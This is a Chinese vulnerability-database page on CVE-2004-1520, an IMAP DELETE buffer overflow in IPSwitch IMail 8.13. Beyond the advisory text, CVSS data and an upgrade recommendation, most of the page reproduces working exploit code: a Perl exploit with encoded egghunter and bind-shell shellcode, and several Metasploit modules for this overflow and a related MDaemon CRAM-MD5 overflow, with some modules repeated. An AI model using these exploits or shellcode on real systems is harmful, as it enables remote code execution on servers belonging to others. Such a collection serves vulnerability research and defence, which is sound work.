CVE-2004-1520
CVSS4.6
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:55:40
NMCOEP    

[原文]Stack-based buffer overflow in IPSwitch IMail 8.13 allows remote authenticated users to execute arbitrary code via a long IMAP DELETE command.


[CNNVD]IPSwitch IMail 8.13远程DELETE命令缓冲区溢出漏洞(CNNVD-200412-722)

        
        Ipswitch IMail Server是一款强大的邮件解决方案。
        Ipswitch IMail Server在处理DELETE命令时处理不正确,远程攻击者可以利用这个漏洞对系统进行缓冲区溢出攻击。
        Ipswitch IMail在处理DELETE命令时缺少正确的边界缓冲区检查,验证用户提交超长参数的DELETE命令可以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1520
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1520
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-722
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110037283803560&w=2
(UNKNOWN)  BUGTRAQ  20041112 IPSwitch-IMail-8.13 Stack Overflow in the DELETE Command
http://www.securityfocus.com/bid/11675
(PATCH)  BID  11675
http://xforce.iss.net/xforce/xfdb/18058
(UNKNOWN)  XF  ipswitch-delete-bo(18058)

- 漏洞信息

IPSwitch IMail 8.13远程DELETE命令缓冲区溢出漏洞
中危 边界条件错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Ipswitch IMail Server是一款强大的邮件解决方案。
        Ipswitch IMail Server在处理DELETE命令时处理不正确,远程攻击者可以利用这个漏洞对系统进行缓冲区溢出攻击。
        Ipswitch IMail在处理DELETE命令时缺少正确的边界缓冲区检查,验证用户提交超长参数的DELETE命令可以进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Ipswitch
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.ipswitch.com/

- 漏洞信息 (627)

IPSwitch IMail 8.13 (DELETE) Remote Stack Overflow Exploit (EDBID:627)
windows remote
2004-11-12 Verified
143 Zatlander
N/A [点击下载]
#!/usr/bin/perl -w
###################################
#
# IPSwitch-IMail-8.13-DELETE
#
# Discovered by : Muts
# Coded by : Zatlander
# WWW.WHITEHAT.CO.IL
#
##################################
#
# Plain vanilla stack overflow in the DELETE command
# Restrictions:
#   - Need valid authentication credentials
#   - Input buffer only allows characters between x20 -> x7e
#
# Credits:
#   - http://www.metasploit.org  - HD Moore for the metasploit shellcode
#   - http://www.edup.tudelft.nl/~bjwever/menu.html - skylined for the ALPHA ascii shellcode generator
#   - http://www.hick.org - for the syscall egghunt code in the paper "Understanding Windows Shellcode"
#
##################################

use IO::Socket;
use Getopt::Std;
use Mail::IMAPClient;

print "Exploit for the IPSwitch IMail DELETE buffer overflow\n";
print "C0d3d by Zatlander\n";
print "Discovered by Muts\n";
print "WWW.WHITEHAT.CO.IL\n";
print "For hacking purposes only!!!\n\n";

# Find shellcode with signature "w00tw00t"; start from esp
# from 0 -> $egghunter = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIVSyBUco0OKbWdp00ptH0uXqRnkHH2a3PLMvtvqzm6NulfePabTiaxbycrb09Gjt5xkTySjeTsEzFmSo2eXyoKRA";
$egghunter = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkN44skpmkt7fPTpptx0UXpBLKkx1Q3PLMtT4QxMVN5lc5sQSDxqyrjSW2VYUJRUXkp9SjVdT5KVosKrWxioKRA";

# Real shellcode: bind shell on port 4444 ( ./alpha edx < shellcode.bin )
$shellcode = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLjH2vUP7puPQCQEV6aGnkbLWT28NkpEWLlKpT35QhgqKZlKPJvxLKQJWPuQXkKSdrSyLKgDLKuQJNVQ9okLP1KpLlP8kPBT7wyQXOVmvahGZKl25kSLwTGdqeKQlK2zUts1jKSVnktL0KNkaJWlUQxkLK7tnkUQM8zKgrVQYP1OqNQMQKkreXWpSnSZp03i1tlKGilKSkvlLKQK5Lnk7kLKckTH0SSXLNpN6nJLKOJvK9IWK1ZLuPfawps0Rwv63cMYiuJHDguPuPS0Np7qWp7pnV6ywhYwMttYt0Yym5QYK62inDvzd0Kwy4nMDniyXYUYkENMHKxmylgKpWPSVRSovS4ruPckLMpKupRqKOYGK9YOoyKsLMBUTTRJs7Ryv1RsYoTtNokOv534pYk9dDNnyrxrtkgWPTKOtwIoRutpfQkp2ppPrpF0spPPaPv09oRuFLniYWuaYKScpSe86bC07a3lmYIpSZVpRpQGyoruQ4QCF7kOv5thBsSdSgIoRuUpNiYWPhpCRmStwpoyXcLGyjDqIPnmQlQ4NLaz7e69zSlkNgJZosXlPTkvQT7TTP1TQvYWpDWTul5QUQLIcLTdRhK9SLQ4RlmY1letPPLMSt5tFpqDrppQRqCaSqSa2iBqRqRspQKO45uPbH0rKNNS4VKOpU5TyoXPLIyvKO45S0QxnMN9fexNYov5S4oyHCbJKOKOTvkOzsyorU30BHl0MZfdaOkORu7tFQyKPSIo8PA";

getopts("h:u:p:", \%args);

if ((!defined $args{h}) || (!defined $args{u}) || (!defined $args{p})) {
   print "Usage: $0 -h [host] -u [username] -p [password]\n";
   exit;}

$usr  = $args{u};
$pwd  = $args{p};
$host = $args{h};

# jb +20; jnb +20  -> jump over return address (0x21 is first ascii safe offset)
$jmp21 = "r!s!";

# 0x6921526A -> pointer to "CALL [EDX+8]" ends up in return address
##########################################################################
# This should hopefully be the only version dependent variable here.
# Find an ASCII safe address pointing to a CALL [EDX+8] for your OS
##########################################################################
$calledx8 = "jR!i";

# aAA aligns ESP with the egghunter shellcode (popad, pop, pop)
$asciieh = "aAA" . $egghunter;
$asciisc = "w00tw00t" . $shellcode;
$email =
   "From: \"The guy hacking you\" <a\@b.com>\r\n" .
   "To: \"Poor You\" <b\@c.com>\r\n" .
   "Subject: $asciisc\r\n" .
   "Date: Wed, 3 Nov 2004 14:45:11 +0100\r\n" .
   "Message-ID: <000101c4c1acdcndj6d69b90$5e01a8c0\@snorlax>\r\n" .
   "Content-Type: text/plain;\r\n\tcharset=\"us-ascii\"\r\n" .
   "Content-Transfer-Encoding: 7bit\r\n" .
   "\r\n" .
   $asciisc;

$payload = "A" x 236 . $jmp21 x 3 . $calledx8 . "S" x 29 . $asciieh . "\r\n";

print "Login in to $host as $usr/$pwd\n";
my $imap = Mail::IMAPClient->new( Server => $host, User => $usr, Password=> $pwd) or die "Cannot connect: $@";
print "count: " . $imap->message_count("Inbox") . "\n";
print "Sending EGG\n";
$imap->select("Inbox") or die "Could not select: $@\n";
my $uid = $imap->append( "Inbox", $email ) or die "Cannot append: $@";
$msg =  $imap->message_string($uid) or die "Cannot get message: $@";
#$msg =  $imap->body_string($uid) or die "Cannot get message: $@"; 
#print "retrieving $uid back: $msg\n";

print "Overflowing DELETE\n";
$imap->delete($payload) or die "Cannot delete: $@n";

print("Finished...\n");

# milw0rm.com [2004-11-12]
		

- 漏洞信息 (1151)

MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit (EDBID:1151)
windows remote
2005-08-12 Verified
143 n/a
[点击下载] [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::mdaemon_imap_cram_md5;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;

my $advanced = { };

my $info = {
	'Name'    => 'Mdaemon 8.0.3 IMAD CRAM-MD5 Authentication Overflow',
	'Version'  => '$Revision: 1.2 $',
	'Authors' => [ 'anonymous' ],

	'Arch'    => [ 'x86' ],
	'OS'      => [ 'win32'],
	'Priv'    => 1,

	'AutoOpts'  => { 'EXITFUNC'  => 'process' },
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 143],
	  },

	'Payload' =>
	  {
		'Prepend'	=> "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
		'Space'     => 500,
		'BadChars'  => "\x00",
	  },

	'Description'  => Pex::Text::Freeform(qq{
    This module exploits a buffer overflow in the CRAM-MD5 authentication of the
    MDaemon IMAP service. This vulnerability was discovered by Muts.
}),

	'Refs'  =>
	  [
		['OSVDB', '11838'],
		['CVE',   '2004-1520'],
		['BID',   '11675'],
	  ],

	'Targets' =>
	  [
		['MDaemon IMAP 8.0.3 Windows XP SP2'],
	  ],

	'Keys' => ['mdaemon'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);

	return($self);
}

sub Exploit {
	my $self = shift;

	my $targetHost  = $self->GetVar('RHOST');
	my $targetPort  = $self->GetVar('RPORT');
	my $targetIndex = $self->GetVar('TARGET');
	my $encodedPayload = $self->GetVar('EncodedPayload');
	my $shellcode   = $encodedPayload->Payload;
	my $target = $self->Targets->[$targetIndex];

	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the NOP module.");
		return;
	}

	my $sock = Msf::Socket::Tcp->new(
		'PeerAddr' => $targetHost,
		'PeerPort' => $targetPort,
	  );
	  
	if($sock->IsError) {
		$self->PrintLine('Error creating socket: ' . $sock->GetError);
		return;
	}

	my $resp = $sock->Recv(-1);
	chomp($resp);
	$self->PrintLine('[*] Got Banner: ' . $resp);

	my $req = "a001 authenticate cram-md5\r\n";
	$sock->Send($req);
	$self->PrintLine('[*] CRAM-MD5 authentication method asked');

	$resp = $sock->Recv(-1);
	chomp($resp);
	$self->PrintLine('[*] Got CRAM-MD5 answer: ' . $resp);

	# Magic no return-address exploitation ninjaness!
	$req = "AAAA" . $shellcode . $self->MakeNops(258) . "\xe9\x05\xfd\xff\xff";
	$req = Pex::Text::Base64Encode($req, '') . "\r\n";
	$sock->Send($req);
	$self->PrintLine('[*] CRAM-MD5 authentication with shellcode sent');

	$resp = $sock->Recv(-1);
	chomp($resp);
	$self->PrintLine('[*] Got authentication reply: ' . $resp);

	$req = "a002 LOGOUT\r\n";
	$sock->Send($req);
	$self->PrintLine('[*] Send LOGOUT to close the thread and trigger an exception');

	$resp = $sock->Recv(-1);
	chomp($resp);
	$self->PrintLine('[*] Got LOGOUT reply: ' . $resp);

	$self->PrintLine("[*] Overflow request sent, sleeping for one second");
	select(undef, undef, undef, 1);

	$self->Handler($sock);
	return;
}

1;

# milw0rm.com [2005-08-12]
		

- 漏洞信息 (16477)

Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow (EDBID:16477)
windows remote
2010-06-22 Verified
0 metasploit
N/A [点击下载]
##
# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the CRAM-MD5
				authentication of the MDaemon IMAP service. This
				vulnerability was discovered by Muts.
			},
			'Author'         => [ 'anonymous' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2004-1520'],
					[ 'OSVDB', '11838'],
					[ 'BID', '11675'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
				],
			'DisclosureDate' => 'Nov 12 2004',
			'DefaultTarget' => 0))
	end

	def exploit
		connect

		print_status("Asking for CRAM-MD5 authentication...")
		sock.put("a001 authenticate cram-md5\r\n")
		res = sock.get_once


		print_status("Received CRAM-MD5 answer: #{res.chomp}")
		# Magic no return-address exploitation ninjaness!
		buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
		req = Rex::Text.encode_base64(buf) + "\r\n"
		sock.put(req)
		res = sock.get_once

		print_status("Received authentication reply: #{res.chomp}")
		print_status("Sending LOGOUT to close the thread and trigger an exception")
		sock.put("a002 LOGOUT\r\n")
		res = sock.get_once

		print_status("Received LOGOUT reply: #{res.chomp}")
		select(nil,nil,nil,1)

		handler
		disconnect
	end

end
		

- 漏洞信息 (16479)

IMail IMAP4D Delete Overflow (EDBID:16479)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: imail_delete.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IMail IMAP4D Delete Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the 'DELETE'
				command of the the IMail IMAP4D service. This vulnerability
				can only be exploited with a valid username and password.
				This flaw was patched in version 8.14.
			},
			'Author'         => [ 'spoonm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2004-1520'],
					[ 'OSVDB', '11838'],
					[ 'BID', '11675'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC'  => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 614,
					'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
					'StackAdjustment' => -3500,
					'EncoderOptions' =>
						{
							'BufferRegister' => 'EDX',
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# alphanum rets :(, will look more into it later
					['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }],
				],
			'DisclosureDate' => 'Nov 12 2004',
			'DefaultTarget' => 0))
	end

	def exploit
		connect_login

		print_status("Sending overflow string...")
		req = 'A683 DELETE '
		req << payload.encoded

		# Jump over code
		req << "\x74\x32\x75\x30"
		req << [target.ret].pack('V')
		req << rand_text_alphanumeric(44)

		# GetEIP code
		req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
		req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59"

		# Alphanumeric jmp back (edx context)
		req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41"
		req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50"
		req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57"
		req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"

		# Run off the stack, so we don't kill our payload, or something...
		req << rand_text_alphanumeric(600)

		# Terminate the request
		req << "\r\n"

		sock.put(req)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83023)

IMail IMAP4D Delete Overflow (PacketStormID:F83023)
2009-11-26 00:00:00
spoonm  metasploit.com
exploit,overflow
CVE-2004-1520
[点击下载]

This Metasploit module exploits a buffer overflow in the 'DELETE' command of the the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'IMail IMAP4D Delete Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the 'DELETE'
				command of the the IMail IMAP4D service. This vulnerability
				can only be exploited with a valid username and password.
				This flaw was patched in version 8.14.
					
			},
			'Author'         => [ 'spoonm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-1520'],
					[ 'OSVDB', '11838'],
					[ 'BID', '11675'],

				],
			'Privileged'     => true,
			'DefaultOptions' => 
				{
					'EXITFUNC'  => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 614,
					'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
					'StackAdjustment' => -3500,
					'EncoderOptions' =>
						{
							'BufferRegister' => 'EDX',
						}
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					# alphanum rets :(, will look more into it later
					['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }],
				],
			'DisclosureDate' => 'Nov 12 2004',
			'DefaultTarget' => 0))
	end

	def exploit
		connect_login
		
		print_status("Sending overflow string...")
		req = 'A683 DELETE '
		req << payload.encoded

		# Jump over code
		req << "\x74\x32\x75\x30"
		req << [target.ret].pack('V')
		req << rand_text_alphanumeric(44)

		# GetEIP code
		req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
		req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59"

		# Alphanumeric jmp back (edx context)
	 	req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41"
		req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50"
		req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57"
		req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"
		
		# Run off the stack, so we don't kill our payload, or something...
		req << rand_text_alphanumeric(600)
		
		# Terminate the request
		req << "\r\n"
		
		sock.put(req)
		
		handler
		disconnect
	end

end
    

- 漏洞信息 (F82989)

Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow (PacketStormID:F82989)
2009-11-26 00:00:00
anonymous  metasploit.com
exploit,overflow,imap
CVE-2004-1520
[点击下载]

This Metasploit module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. This vulnerability was discovered by Muts.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the CRAM-MD5
				authentication of the MDaemon IMAP service. This
				vulnerability was discovered by Muts.
					
			},
			'Author'         => [ 'anonymous' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-1520'],
					[ 'OSVDB', '11838'],
					[ 'BID', '11675'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},			
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
				],
			'DisclosureDate' => 'Nov 12 2004',
			'DefaultTarget' => 0))
	end

	def exploit
		connect
		
		print_status("Asking for CRAM-MD5 authentication...")
		sock.put("a001 authenticate cram-md5\r\n")
		res = sock.get_once
		
		
		print_status("Received CRAM-MD5 answer: #{res.chomp}")
		# Magic no return-address exploitation ninjaness!
		buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
		req = Rex::Text.encode_base64(buf) + "\r\n"
		sock.put(req)
		res = sock.get_once
		
		print_status("Received authentication reply: #{res.chomp}")
		print_status("Sending LOGOUT to close the thread and trigger an exception")
		sock.put("a002 LOGOUT\r\n")
		res = sock.get_once
		
		print_status("Received LOGOUT reply: #{res.chomp}")
		sleep(1)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

11838
Ipswitch IMail IMAP Service DELETE Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in IMail IMAP Service. The IMail IMAP Service fails to perform proper bounds checking when processing 'DELETE' commands, resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2004-11-12 Unknow
2004-11-12 Unknow

- 解决方案

Upgrade to version 8.14.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站